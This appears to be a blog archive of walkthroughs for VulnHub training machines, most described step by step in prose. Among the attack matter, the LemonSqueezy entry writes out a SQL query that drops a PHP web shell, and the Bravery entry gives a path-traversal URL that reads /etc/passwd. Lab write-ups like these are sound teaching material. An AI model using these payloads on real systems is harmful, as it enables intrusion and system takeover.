Whitelist

w34kn3ss

2022-03-01T12:30:00.000-06:00

W34KN3SS

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine w34kn3ss, from the VulnHub pentesting platform.

- w34kn3ss can be downloaded from here:

https://www.vulnhub.com/entry/1,270/

- Once the virtual machine downloaded and extracted with VirtualBox:

2 - ENUMERATION

- Looking for IP with netdiscover, it is 192.168.1.43:

- Scanning with Nmap:

- Scanning deeper both ports 80 and 443, we find domain weakness.jth:

- Dirbusting the web server at port 80:

- Nothing interesting at folders /blog, /test and /uploads:

- Editing /etc/hosts by adding domain weakness.jth:

- Dirbusting weakness.jth we find /private:

- Going to http://weakness.jth it seems to be a rabbit hole, though there is a hint about a potential user n30:

- However http://weakness.jth/private provides interesting information:

3 - EXPLOITATION

- Downloading mykey.pub and moving to the working directory it seems to be an encrypted key for SSH:

- Reading notes.txt we learn that the key was generated by openssl 0.9.8c-1:

- Looking for exploits related to openssl 0.9.8c-1:

- We are dealing with vulnerability CVE-2008-0166: "OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys."

http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0166

- Copying and reading 5622.txt:

- Downloading and extracting 5622.tar.bz2:

- Now we can look for the SSH private key by passing the encrypted key as parameter to grep, finding it inside /rsa/2048:

- SSH-ing the target with the private key for user n30:

4 - READING 1st FLAG

- Looking inside n30's home folder:

- Reading user.txt:

5 - PRIVILEGE ESCALATION

- Two interesting hints:

a) there is a file .sudo_as_admin_successful

b) n30 belongs to group sudo

- Unfortunately we cannot access to n30's sudoer privileges because we don't have the password:

- Regarding the file code we notice that it's Python 2.7 byte-compiled:

- Transferring code to Kali:

- Installing uncompyle6:

-Trying to uncompile code if fails because there is no extension .pyc:

- Adding extension .pyc:

- Running code.pyc there is nothing of interest:

- Now uncompyle6 reverses code.pyc into readable Python source code:

-Focusing the attention on the column we have n30:dMASDNB!!#B!#!#33

- Finally we can try n30's sudoer privileges:

- We get a root shell:

6 - CAPTURING THE 2nd FLAG

- Reading root.txt:

Healthcare

2022-03-01T12:16:00.000-06:00

HEALTHCARE

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Healthcare, from the VulnHub pentesting platform.

- Healthcare can be downloaded from here:

https://www.vulnhub.com/entry/healthcare-1,522/

- Once the virtual machine downloaded and extracted with VirtualBox:

2 - ENUMERATION

- Discovering IP 192.168.1.46:

- Scanning with Nmap:

- Scanning deeper port 21:

- Scanning deeper port 80:

- Browsing the web server:

- View-sourcing there are some misleading information:

- For instance folder /admin leads to nothing:

- Dirbusting with rockyou.txt:

- There is a hidden folder called openemr:

- Openemr is a medical management application:

3 - EXPLOITATION

- Looking for exploits for Openemr version 4.1.0:

- Reading 49742.py there is a vulnerable injection point that can be used with Sqlmap:

- Looking for databases with Sqlmap:

- Looking for tables inside database openemr:

.....................................

- Dumping all about table users we find cleartext passwords for two users:

- So finally we have credentials admin:ackbar and medical:medical.

- Logging into Openemr as user admin:

- There is a management interface for user admin:

- Files at website are stored at /var/www/html/openemr/sites/default:

- Let's create an exploit named myshell.php:

- Uploading myshell.php to /var/www/html/openemr/sites/default it's not allowed:

- However it is feasible to upload myshell.php to /openemr:

- Setting a listening session at port 3333:

- Now, just calling myshell.php with curl we have a remote shell:

4 - CAPTURING THE 1st FLAG

- Browsing the /home folder we find an additional user called almirant:

- Inside almirant's home folder we find user.txt and the 1st flag:

......................................

5 - PRIVILEGE ESCALATION

- Looking for files with setuid bit:

- For instance file healthcheck, owned by root, it can be run by user medical because of the setuid bit:

- Running healthcheck:

- Applying strings to healthcheck we discover that it uses some commands like fdisk, ifconfig, du, ... without the whole path (/bin, /sbin):

- So moving to /tmp let's write a new script fdisk containing /bin/bash, and then let's update enviroment variable PATH pointing to /tmp:

- Now, when healtcheck (owned by root) calls to fdisk it will execute /bin/bash as a root.

- Running again healthcheck we have finally a root shell:

6 - CAPTURING THE 2nd FLAG

- Reading root.txt:

InfoSec OSCP Voucher

2022-03-01T10:06:00.000-06:00

INFOSEC OSCP VOUCHER

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine InfoSec OSCP Voucher, from the VulnHub pentesting platform.

- InfoSec OSCP Voucher can be downloaded from here:

https://www.vulnhub.com/entry/infosec-prep-oscp,508/

- Once the virtual machine downloaded and extracted with VirtualBox:

2 - ENUMERATION

- Scanning with Nmap:

- Scanning deeper port 80 we find robots.txt and the file secret.txt:

- Browsing the web server:

- However the most interesting piece of information is at the bottom part: "the only user on this box is oscp"

- secret.txt is a large text file ended with == , so it is probably encoded with base64:

- Transferring secret.txt to Kali:

- Decoding secret.txt and passing to a new file named key, we discover it is an OpenSSH Private key:

3 - EXPLOITATION

- Setting right permissions to key:

- Now we can SSH with user oscp and key:

4 - PRIVILEGE ESCALATION

- Looking for binaries with SUID, let's focus our attention on /usr/bin/bash:

- Finally it's easy to get a root shell, just running /usr/bin/bash with option -p:

5 - CAPTURING THE FLAG

- Going to root's folder and reading the flag:

Symfonos_5

2022-03-01T08:56:00.000-06:00

SYMFONOS_5

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Symfonos_5, from the VulnHub pentesting platform.

- Symfonos_5 can be downloaded from here:

https://www.vulnhub.com/entry/symfonos-52,415/

- Once the virtual machine downloaded and extracted with VirtualBox

2 - ENUMERATION

- Scanning with Nmap:

- Browsing the web server:

- Dirbusting the web server we find admin.php:

- Connecting to admin.php there is a Login form:

3 - EXPLOITATION

- Wfuzz and wordlist SQL.txt bruteforce the Login application:

- There is a successful 302 response for Payload "*", what we should try at the Login form:

- The Login is successful and we are presented with the page home.php:

- View-sourcing home.php there is an interesting URL that leads to the idea of LFI (Local File Inclusion):

- Checking the URL it connects to the localhost 127.0.0.1 and the page portraits.php:

- Finally we discover that the webpage is vulnerable to RFI, because we can read /etc/passwd:

- Going to admin.php:

- View-sourcing admin.php we discover credentials admin:qMDdyZh3cT6eeAWD for LDAP:

- ldapsearch opens a connection to LDAP server at port 389 and provides a Base64 encrypted password Y2V0a0tmNHdDdUhDOUZFVA== for user zeus:

- Decrypting Y2V0a0tmNHdDdUhDOUZFVA==

- Now we can SSH:

4 - PRIVILEGE ESCALATION

- User zeus has got suder privilege for /usr/bin/dpkg:

- dpkg is a tool to manage Debian packages, so the idea for Privilege Escalation could to run a deb package containing a script to run /bin/bash as a root.

- fpm builds different types of packages like deb, rpm, etc..:

https://fpm.readthedocs.io/en/v1.13.1/intro.html

- Installing fpm:

- Writing a simple exploit.sh:

- fpm creates a deb package for exploit.sh:

- Transferring exploit_1.0_amd64.deb:

- Running exploit_1.0_amd64.deb with /usr/bin/dpkg we get a root shell:

5 - CAPTURE THE FLAG

- Reading proof.txt:

Symfonos_2

2022-03-01T08:25:00.000-06:00

SYMFONOS 2

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Symfonos_2, from the VulnHub pentesting platform.

- Symfonos_2 can be downloaded from here:

https://www.vulnhub.com/entry/symfonos-2,331/

- Once the virtual machine downloaded and extracted with VirtualBox:

2 - ENUMERATION

- Scanning with Nmap:

- Connecting to the web server:

- Scanning with enum4linux we discover a shared folder named anonymous:

- Connecting with credentials anonymous:anonymous:

- Changing to folder backups and getting log.txt:

- log.txt reveals the existence of user aeolus:

3 - EXPLOITATION

- Hydra and rockyou.txt discover password sergioteamo for user aeolus:

- However direct SSH access is denied:

- Metasploit with module ssh_login yields better result:

4 - PRIVILEGE ESCALATION

- netstat lists open connections, for instance at port 8080:

- To access web server at port 8080 we must forward connection to another port, for instance 4444:

- Now, connection to the hidden web server is available:

- Application LibreNMS is vulnerable to this exploit:

- Looking for a related Metasploit module:

- Setting parameters and running the exploit we have a new command shell, for user named cronus:

- Improving the shell:

- Searching for cronus' sudoer privileges:

- Command mysql with option \! allows to run any \system command, as explained here:

https://dev.mysql.com/doc/mysql-shell/8.0/en/mysql-shell-commands.html

- Running /bin/bash we get a remote root shell:

5 - CAPTURING THE FLAG

- Reading proof.txt:

Tiki

2022-02-19T13:34:00.001-06:00

TIKI

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Tiki, from the VulnHub pentesting platform.

- Tiki can be downloaded from here:

https://www.vulnhub.com/entry/tiki-1,525/

- Once the virtual machine downloaded and extracted with VMware:

- By the way, the initial page indicates the existence of user silky:

- Netdiscover gives the IP 192.168.1.42:

2 - ENUMERATION

- Scanning all ports with Nmap:

- Scanning deeper port 80 and reading robots.txt there is a folder named /tiki:

- Dirbusting the web server:

- Browsing the web server:

- Going to /tiki it redirects to /tiki-index.php, where we can acces to a Login form:

- Enumerating with enum4linux we find user silky and shared folder Notes:

- Connecting to share folder Notes and dowloading content Mail.txt:

- Reading Mail.txt we discover some credentials:

3 - EXPLOITATION

- However these credentials are not enough to SSH the target:

- Searching for exploits related with Tiki:

- Taking the script 48927.py and copying it to the local working folder:

- Launching the Python script the answer gives us a couple of hints to exploit Tiki:

- So let's use BurpSuite to take advantage of the exploit:

- Intercepting Login credentials admin:admin with Burp:

- Removing password and turning the interception off the result is that we are logged in as admin:

- Going to the tab Search and finding tab Credentials we discover silky:Agy8Y7SPJNXQzqA

- SSH-ing with credentials silky:Agy8Y7SPJNXQzqA we have a shell:

4 - PRIVILEGE ESCALATION

- It is interesting that user silky is part of the group sudo:

- Also there is the file .sudo_as_admin_successful:

- We are lucky that user silky has full sudoer privileges:

- Finally we get a root shell:

5 - CAPTURING THE FLAG

- Reading flag.txt:

Lemon_Squeezy_1

2022-02-14T10:45:00.001-06:00

LEMON SQUEEZY 1

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine LemonSqueezy_1, from the VulnHub pentesting platform.

- LemonSqueezy_1 can be downloaded from here:

https://www.vulnhub.com/entry/lemonsqueezy-1,473/

- Once the virtual machine downloaded and extracted with VMware:

2 - ENUMERATION

- Scanning with Nmap:

- Browsing the web server:

- Dirbusting the web server we find /phpmyadmin and /wordpress:

- Going to /phpmyadmin:

- Going to /wordpress:

- Editing /etc/hosts:

- Now lemonsqueezy/wordpress presents the Wordpress webpage:

- Wpscan scans Wordpress, finding users lemon and orange:

- Adding users admin, orange and lemon to text file users.txt:

- Wpscan and rockyou.txt find the password ginger for user orange:

- Logging into Wordpress with credentials orange:ginger:

- Reading the post we discover the potential password n0t1n@w0rdl1st!:

- Trying phpmyadmin now with credentials orange:n0t1n@w0rdl1st!:

- There are 2 encrypted passwords for lemon and orange:

- Hash-identifier identifies the hashes as MD5 (Wordpress), however after several trials we were not able to decrypt them:

3 - EXPLOITATION

- Creating a new table and entering this crafted SQL query we will inject the exploit shell.php:

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/shell.php"

- Now we are able to perform Remote Code Execution with exploit shell.php, for instance commands like id:

- Also cat /etc/passwd:

- Now let's inject a Netcat reverse shell command towards Kali:

- It works and we have a shell:

4 - PRIVILEGE ESCALATION

- Looking for cron jobs we find logrotate, what is writable and can be run as root:

- Reading logrotate:

- Let's try to edit logrotate by writing an exploit to it.

- First, creating an exploit with Msfvenom:

- Setting a Netcat listener:

- Rewriting logrotate:

- Finally, after waiting for 2 minutes until logrotate is run, we get a root shell:

5 - CAPTURING THE FLAG

- Reading root.txt:

Symfonos_3

2022-02-11T13:35:00.005-06:00

SYMFONOS_3

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Symfonos_3, from the VulnHub pentesting platform.

- Symfonos_3 can be downloaded from here:

https://www.vulnhub.com/entry/symfonos-31,332/

- Once the virtual machine downloaded and extracted with VirtualBox:

2 - ENUMERATION

- Scanning with Nmap:

- Browsing the web server:

- View-sourcing there is a note about "underworld":

- Dirbusting the web server we find /cgi-bin/underworld:

- Going to /cgi-bin/underworld:

- Output is similar to command uptime:

3 - EXPLOITATION

- Metasploit has some exploits related to cgi script, for instance this one related to vulnerability Shellshock:

https://www.rapid7.com/db/modules/exploit/multi/http/apache_mod_cgi_bash_env_exec/

- A Meterpreter session is triggered:

- Getting a shell:

- One interesting thing about user cerberus is that he belongs to group pcap, as previous image shows.

- So the right tools for reading .pcap files are tcpdump and Wireshark.

- First, running tcpdump at local interface and saving to file.pcap:

- Now we've got a file.pcap that can be transferred to Kali to be analyzed with Wireshark:

- Opening file.pcap with Wireshark, putting a filter for FTP traffic and following the stream we discover credentials for user hades:

- Now, we can try SSH with these credentials: hades: PTpZTfU4vxgzvRBE

4 - PRIVILEGE ESCALATION

- The new user hades belongs to group gods:

- Let's find files owned by group gods, for instance sitecustomize.py has root privileges:

- sitecustomize.py is a Python script that can be adpated to our needs:

- Just adding these 3 lines at the beginning of the file:

- Setting a Netcat listener:

- Running sitecustomize.py we get a root shell:

5 - CAPTURING THE FLAG

- Reading proof.txt:

Symfonos_1

2022-02-10T12:39:00.000-06:00

SYMFONOS_1

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Symfonos_1, from the VulnHub pentesting platform.

- Symfonos_1 can be downloaded from here:

https://www.vulnhub.com/entry/symfonos-1,322/

- Once the virtual machine downloaded and extracted with VirtualBox:

2 - ENUMERATION

- Discovering IP 192.168.1.35 with netdiscover:

- Scanning ports with Nmap:

- Enumerating with enum4linux:

- So there is one user named helios and two shared folders named helios and anonymous.

- Accessing to anonymous and getting file attention.txt:

- Reading attention.txt we discover 3 potential passwords:

- The 2nd password qwerty allows access for user helios to shared folder helios, where there are two files research.txt and todo.txt:

- Reading research.txt and todo.txt, we will focus our attention on folder /h3l105:

- Browsing the web server:

- Going to /h3l105 we find a Wordpress site:

- Scanning the site with Wpscan we find a folder /uploads:

- Going to /uploads there is siteeditor:

3 - EXPLOITATION

- Site Editor 1.1.1 is a Wordpress plugin vulnerable to a LFI exploit:

- Copying as URL the Proof of Concept we check that Symfonos1 is vulnerable to LFI:

- Now, let's try to include a PHP command through the STMP server:

- Adapting the exploit's Proof of Concept to command pwd:

- Same thing with command id:

- Finally let's try to execute a Netcat reverse shell:

- Setting a listener session:

- Passing the exploit to the URL and running it:

- As a consequence a remote shell is triggered:

- Improving the shell and changing to user helios' home folder:

4 - PRIVILEGE ESCALATION

- Looking for files with bit Setuid:

- Exploring /opt/statuscheck:

- Applying command strings to /opt/statuscheck:

- So it happens that /opt/statuscheck runs curl directly, with no path.

- The idea to Privilege Escalation would be to redo curl as a bash script, store it at /tmp, and change the variable PATH so that curl is run directly from /tmp.

- The original path for curl:

- Going to /tmp and creating a new curl:

- Editing PATH by including /tmp to the beginning:

- Now /opt/statuscheck calls curl inside /tmp and a root shell is achieved:

5 - CAPTURING THE FLAG

- Reading proof.txt:

Toppo_1

2022-02-06T16:36:00.000-06:00

TOPPO_1

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Toppo_1, from the VulnHub pentesting platform.

- Toppo_1 can be downloaded from here:

https://www.vulnhub.com/entry/toppo-1,245/

- Once the virtual machine downloaded and extracted with VirtualBox:

2 - ENUMERATION

- Scanning all ports with Nmap:

- Dirbusting the web server we find a directory called /admin:

- Browsing the web server:

- Going to /admin there is a text file called notes.txt:

- Reading notes.txt there is a message about a potential password, either :/ 12345ted123 or maybe just 12345ted123. Later we will try some related options:

3 - EXPLOITATION

- SSH with credentials ted:12345ted123 it works:

4 - PRIVILEGE ESCALATION

- Looking for files with bit SUID we focus our attention on /usr/bin/python2.7:

- /usr/bin/python2.7 is owned by root, and also it has enabled the bit SUID:

- Now it's very simple to get a root shell, just by improving the shell:

5 - READING THE FLAG

- Going to home folder /root we can read flag.txt:

DerpNStink

2022-02-03T14:05:00.000-06:00

DERP_N_STINK_1

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process (discovering 4 flags) for the vulnerable machine DerpNStink, from the VulnHub pentesting platform.

- DerpNStink can be downloaded from here:

https://www.vulnhub.com/entry/derpnstink-1,221/

- Once downloaded DerpNStink and extracted with VirtualBox:

2 - ENUMERATION

- netdiscover identifies DerpNStink's IP 192.168.1.32:

- Scanning with Nmap:

- Scanning deeper port 80 we discover robots.txt and directories /php, /temporary:

- Going to the browser:

- dirbusting the web server we also discover directory /weblog, what according to its content seems to be a Wordpress webpage:

- Reading robots.txt:

- Acess to /php is denied:

- Nothing interesting at /temporary:

- Editing /etc/hosts:

- Now we can view-source the webpage and discover FLAG_1:

- Browsing /weblog:

- The bottom part confirms that it is powered by Wordpress:

- So let's use Wpscan to scan the Wordpress webpage, searching for users and plugins, and discovering user admin and plugin slideshow-gallery:

- Trying admin:admin the login is successful:

3 - EXPLOITATION

- Copying locally php-reverse-shell.php, renaming it to myshell.php and adapting to our needs:

- Setting a listener session:

- Now, let's upload myshell.php to Slideshow gallery:

- Once we are sure that the upload has been successful let's Save Slide:

- As a consequence a remote shell is triggered:

- It seems to be two users mrderp and stinky:

- Going to /weblog:

- Reading wp-config.php we discover database credentials root:mysql:

- Entering the database:

- Showing databases:

- Using database wordpress and looking for tables inside it:

- Selecting all from table wp_users:

- Let's focus our attention on these encrypted credentials:

- Creating file text p:

- Identifying what type of encryption is used:

- Applying John The Ripper and wordlist rockyou.txt we discover password wedgie57:

- Using these password wedgie75 for user unclestinky:

- The FLAG_2 is available:

- Access to SSH for user unclestinky is denied:

- By the way, at this moment of the process let's improve the shell :

- Switching to user stinky with password wedgie75 is allowed:

- Checking home folder for user stinky:

- There is a public key available:

- Inside Desktop we can read FLAG_3:

- Inside Documents there is a .pcap file:

- Transferring the .pcap file to Kali:

- Opening with wireshark:

- Follow the TCP stream we discover credentials mrderp:derpderpderpderpderpderpderp:

4 - PRIVILEGE ESCALATION

- SSH-ing for user mrderp:

- Checking for mrderp's sudoer privileges:

- However when going to /home/mrderp the surprise is that /binaries/derpy* does not exist:

- Creating folder /binaries and script derpy1.sh, passing to it "bin/bash'', and giving execution permissions:

- Executing derpy1.sh with sudo we get a root shell:

- Reading FLAG_4:

Bravery

2022-02-02T12:34:00.001-06:00

BRAVERY

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Bravery, from the VulnHub pentesting platform.

- Bravery can be downloaded from here:

https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

- Once downloaded Bravery and extracted with VirtualBox:

2 - ENUMERATION

- netdiscover helps to learn about Bravery's IP 192.168.1.26:

- Scanning with Nmap:

- There is a NFS (Network File System) server at port 2049, so command showmount shows information about it:

- Directory /var/nfsshare is shared and we can mount it at Kali:

- Reading some of the files we don't find anything interesting:

- However this two files seem to suggest that the string qwertyuioplkjhgfdsazxcvbnm could be a valid password:

- Going inside directory itinerary:

- Exploring david:

- Scanning port 445 deeper:

- enum4linux discovers two shared folders, anonymous and secured:

- Also, two users named david and rick:

- Accessing anonymous we find some directories, however there is nothing remarkable inside them:

- Getting readme.txt:

- readme.txt informs us about the internal file-sharing system across SMB:

- Connecting to folder secured as user David, and using password qwertyuioplkjhgfdsazxcvbnm:

- Getting all text files:

- Reading the files we discover some web pages:

- So we get knowledge of webpages developmentsecretpage, devops, genevieve and also directortestpagev1.php:

- Clicking tabs Internal Use Only -> Knowledge Management we discover CuppaCMS:

3 - EXPLOITATION

- Looking for exploits related to CuppaCMS:

- The exploit allows to read /etc/passwd:

http://192.168.1.26/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

- Copying locally php-reverse-shell.php, renaming myshell.php and adapting it to our needs:

- Setting a Netcat listener at port 1234:

- Setting a SimpleHTTPServer at port 8000:

- Applying again the RFI, just by including this line at the browser:

- A remote shell is achieved:

4 - PRIVILEGE ESCALATION

- Looking for SUID binaries we find /usr/bin/cp:

- Also, we detect that maintenance.sh is a cron job owned by root:

- Running maintenance.sh is denied:

- Now, let's create a exploit with Msfvenom:

- Setting a listener session:

- Creating the script new_maintenance.sh:

- Transferring new_maintenance.sh from Kali to Bravery:

- Copying with cp:

- Waiting until maintenance.sh is run, a root shell is achieved:

5 - CAPTURING THE FLAG

- Reading proof.txt:

EVM

2022-01-25T11:42:00.004-06:00

EVM

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine EVM, from the VulnHub pentesting platform.

- EVM can be downloaded from here:

https://www.vulnhub.com/entry/evm-1,391/

- Once downloaded EVM and extracted with VirtualBox:

2 - ENUMERATION

- netdiscover helps to find EVM's IP 192.168.1.31:

- Scanning with Nmap:

- Browsing the web server there is a message about a wordpress vulnerable webapp:

3 - EXPLOITATION

- WPScan discovers plugins and users at Wordpress, for instance user c0rrupt3d_brain:

- Again WPSCan, now in combination with wordlist rockyou.txt, discovers credentials c0rrupt3d_brain:24992499

- Metasploit exploit wp_admin_shell_upload helps to trigger a shell, by setting c0rrupt3d_brain:24992499 as parameters:

- Running the exploit a Meterpreter session is opened:

4 - PRIVILEGE ESCALATION

- Looking for folders and files we find root3r:

- Inside root3r there is a text file .root_password_ssh.txt where we can find the password willy26:

- However it is not valid to SSH as a root:

- Trying another way, to switch as a root from the Meterpreter session we need a shell:

- Improving the shell:

- Now a root shell is achieved:

5 - CAPTURING THE FLAG

- Finally, reading proof.txt:

RickdiculouslyEasy

2022-01-19T13:26:00.005-06:00

RICKDICULOUSLY EASY

- Layout for this exercise:

- The goal of this exercise is to develop a hacking process for the vulnerable machine RickdiculouslyEasy, from the VulnHub pentesting platform.

- RickdiculouslyEasy can be downloaded from here:

https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/

- Once downloaded RickdiculouslyEasy and extracted with VirtualBox:

- Description of the virtual machine says that there are 130 points worth of FLAGs available:

- Searching for IP 192.168.1.29:

- Scanning with Nmap:

- Exploring FTP server we find that there is Anonymous login allowed:

- A 10 points FLAG (10/130) is available:

- Scanning port 22 we don't find nothing special:

- Another 10 points FLAG (20/130) is available just by scanning port 13337:

- Scanning port 9090 we find a web server:

- Browsing the server at port 9090 we find a 10 points FLAG (30/130):

- Scanning port 60000 suggest the presence of a reverse shell available:

- Connecting to the port 60000 with NetCat we discover a 10 points FLAG (40/130):

- Scanning port 80:

- Dirbusting port 80 we find robots.txt and passwords:

- robots.txt points to two cgi scripts:

- Going to webpage passwords:

- Reading a 10 points FLAGS (50/130):

- Also, there are directions for a password that could be hidden:

- Just viewing the source we find the password winter:

- First cgi script is under construction:

- Second cgi script leads to a tracer:

- Trying to run commands at the tracer, it works with id:

- cat and more provide /etc/passwd, where we learn about users RickSanchez, Morty and Summer:

- Scanning port 22222, it is a SSH server:

- Trying credentials morty:winter access is denied:

- Trying credentials Summer:winter it works:

- Another 10 points FLAG (60/130) is available:

- Unfortunately user Summer does not have sudoer privileges:

- Looking for files into /home:

- Morty has interesting files inside his home folder:

-Transferring Safe_Password.jpg and journal.txt.zip from RickdiculouslyEasy to Kali:

- Transfer is successful:

- Applying command strings over the picture Safe_password.jpg we discover password Meeseek, needed for opening journal.txt.zip:

- Unzipping with password Meeseek we find a 20 points FLAG (80/130). It says that the flag 131333 could be a safe password, and interesting hint for later:

- Now, let's explore user RickSanchez's home folder:

- There is the executable file safe:

- However it's not possible to run it:

- Let's transfer safe to Kali:

- Running ./safe, it seems some argument is needed:

- Inputing flag 131333 we discover a 20 points FLAG (100/130 points). Also, some directions to find RickSanchez's password:

- The other folder does not contain flags:

- So let's try to apply hints found before for RickSanchez's password:

- First of all, we are able to find information about RickSanchez's band just by using Google:

- Now, taking the 3 words of the band (The, Flesh, Curtains), and applying crunch:

- Joining the three files into one:

- Applying Hydra to user RickSanchez and passing ps.txt for passwords at port SSH 22222, we find the new password P7Curtains:

- SSH-ing with credentials RickSanchez:P7Curtains is succesful:

- It happens that user RickSanchez has (ALL)ALL sudoer privileges:

- Getting a root shell:

- Reading the last 30 points FLAG (130/130):

Misdirection

2022-01-14T13:28:00.000-06:00

MISDIRECTION

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Misdirection, from the VulnHub pentesting platform.

- Misdirection can be downloaded from here:

https://www.vulnhub.com/entry/misdirection-1,371/

- Once downloaded Misdirection and extracted with VmWare:

2 - ENUMERATION

- netdiscover helps to identify Misdirection's IP 192.168.1.28:

- Scanning with Nmap:

- Browsing ports 80 and 8080:

- Dirbusting web server at port 8080:

- After browsing some webpages we find a management shell at webpage /debug:

3 - EXPLOITATION

- Setting a Netcat listener at port 5555:

- Sending a reverse shell command from Misdirection to Kali:

- Finally a remote shell is triggered:

- Improving the shell:

- Going to folder /home we discover the user brexit:

4 - CAPTURING 1st FLAG

- Trying to read user.txt the access is denied:

- Checking www-data's sudoer privileges we discover he can run /bin/bash as user brexit:

- Switching to user brexit:

- Now we can read user.txt:

5 - PRIVILEGE ESCALATION

- Finding that file /etc/passwd is writable:

- Creating an encrypted password for a new user:

- Adding this new line to /etc/passwd:

- Now switching to newuser we have a root shell:

6 - CAPTURING THE 2nd FLAG

- Reading root.txt:

Mercy v2

2022-01-06T11:38:00.000-06:00

MERCY v2

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Mercy v2, from the VulnHub pentesting platform.

- Mercy v2 can be downloaded from here:

https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/

- Once downloaded Mercy v2 and extracted with VirtualBox:

2 - ENUMERATION

- netdiscover helps to identify Mervy v2's IP 192.168.1.25:

- Scanning with Nmap:

- Scanning deeper port 8080 we notice the existence of robots.txt and /tryharder/tryharder:

- Going to robots.txt:

- Going to /tryharder/tryharder we find a Base64 encoded text:

- Decoding from Base64:

- Let's enumerate the SMB server running at port 445:

- So we have found 4 users.

- Remembering the text decoded with Base64:

- Trying credentials qiu:password to access the SMB server we are successful:

- Examining content:

- After downloading content and not finding anything of great interest, we go to folder .private and download its content:

- Reading the 3 files:

- So we can read references to Port Knocking Daemon Configuration and sequences of numbers to open ports both 80 and 22:

- Using command knock to open services HTTP and SSH:

- Now port 80 is working normally:

- From Nmap we learn that there is robots.txt and two available directories: /mercy and /nomercy:

- Browsing /mercy:

- Browsing /nomercy we find RIPS, a popular static code analysis tool to automatically detect vulnerabilities in PHP applications:

3 - EXPLOITATION

- Looking for exploits related to RIPS we find that it is vulnerable to Multiple Local File Inclusions:

- Taking advantage of the vulnerability and reading /etc/passwd:

- From enumeration we know that there is a Tomcat server running:

- So let's try to access Tomcat's tomcat-users.xml, where we can find interesting credentials:

- Metasploit helps to get a shell using these Tomcat credentials:

- Improving the shell:

- Trying to switch to the first user is unsuccessful:

- However we can switch to user fluffy:

4 - PRIVILEGE ESCALATION

- Looking into the folder .private there are some interesting files:

- Reading .secrets:

- File timeclock is owned by root, and it seems to be a script to read time hosted at web page /time:

- So one idea to get a remote root shell could be to add a bash command to timeclock:

- Now, setting a Netcat listener at port 3333:

- After timeclock is run, we have a remote root shell:

5 - CAPTURING THE FLAG

- Reading proof.txt:

Torment

2022-01-03T13:12:00.001-06:00

TORMENT

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Torment from the VulnHub pentesting platform.

- Torment can be downloaded from here:

https://www.vulnhub.com/entry/digitalworldlocal-torment,299/

- Once downloaded Torment and extracted with VMware:

2 - ENUMERATION

- netdiscover helps to identify Torment's IP 192.168.1.24:

- Scanning with Nmap we see a lot of open ports:

- Going deeper with port 21 there is an Anonymous FTP server:

- Connecting to the FTP server:

- Looking for content, there are some hidden interesting directories:

- Most of the directories are empty, with the exception of .ngircd and .ssh.

- Getting channels from .ngircd:

- Getting id_rsa from .ssh:

- Transfers are successful:

- Reading channels:

- Reading id_rsa:

3 - EXPLOITATION

- ngircd is an IRC chat server that is listening at port 6667:

- To access ngircd we can use client HexChat:

- Installing HexChat:

- Launching HexChat:

- Adding server torment:

- Configuring torment at IP 192.168.1.24 and port 6667 (important: uncheck tab Accept invalid SSL certificates). Also, using default password wealllikedebian:

https://git.in-ulm.de/cbiedl/ngircd/raw/master/debian/ngircd.conf

- Connecting to server torment:

- Joining channel tormentedprinter:

- We have found this password for configuration purposes:

mostmachineshaveasupersercurekeyandalongpassphrase

- CUPS is a printing server that is running at port 631:

- Connecting to the CUPS server at port 631:

- Clicking tab Printers we find a list of printing services users:

- Gathering all potential usernames:

- Msfconsole helps to enumerate SMTP service, passing file u and discovering that Patrick and Qiu are essential and real users:

- Also, we could know about Patrick and Qiu from Torment's login screen:

- SSH-ing as user Patrick, with id_rsa and password mostmachineshaveasupersercurekeyandalongpassphrase:

- Sudoer privileges for Patrick include poweroff and reboot services with command systemctl:

4 - PRIVILEGE ESCALATION

- Looking for files with write and execute permissions for all users, we find that apache2.conf is writable:

- Adding user qiu to Apache configuration:

- Now, let's use webshell php-reverse-shell.php, adapting it to our needs and renaming as myshell.php:

- Setting a web server at Kali:

- Transferring myshell.php from Kali to Torment:

- Executing /bin/sytemctl/reboot as a sudoer we ensure that user qiu runs service apache2:

- Setting a listener at port 1234:

- Running myshell.php:

- A reverse shell is triggered:

- We check that user qiu can run /usr/bin/python as a sudoer with root privileges and no password:

- Using qiu's sudoer privileges we get a root shell:

5 - CAPTURING THE FLAG

- Reading proof.txt:

Joy

2021-11-13T10:24:00.007-06:00

JOY

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Joy from the VulnHub pentesting platform.

- Joy can be downloaded from here:

https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

